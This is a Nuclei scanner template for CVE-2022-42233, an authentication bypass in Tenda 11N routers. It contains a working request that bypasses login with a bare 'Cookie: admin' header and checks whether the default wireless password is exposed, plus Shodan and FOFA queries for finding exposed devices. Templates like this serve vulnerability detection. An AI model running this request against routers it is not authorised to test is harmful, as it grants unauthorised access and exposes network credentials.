id: CVE-2022-42233

info:
  name: Tenda 11N - Authentication Bypass
  author: For3stCo1d
  severity: critical
  description: |
    Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability.
  reference:
    - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42233
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-42233
    cwe-id: CWE-287
  metadata:
    fofa-query: product=="Tenda-11N-Wireless-AP"
    shodan-query: http.title:"Tenda 11N"
    verified: "true"
  tags: cve,cve2022,tenda,auth-bypass,router,iot

requests:
  - raw:
      - |
        GET /index.asp HTTP/1.1
        Host: {{Hostname}}
        Cookie: admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'def_wirelesspassword'
          - 'Tenda 11N'
        condition: and
        case-insensitive: true

      - type: word
        part: header
        words:
          - 'GoAhead-Webs'

      - type: status
        status:
          - 200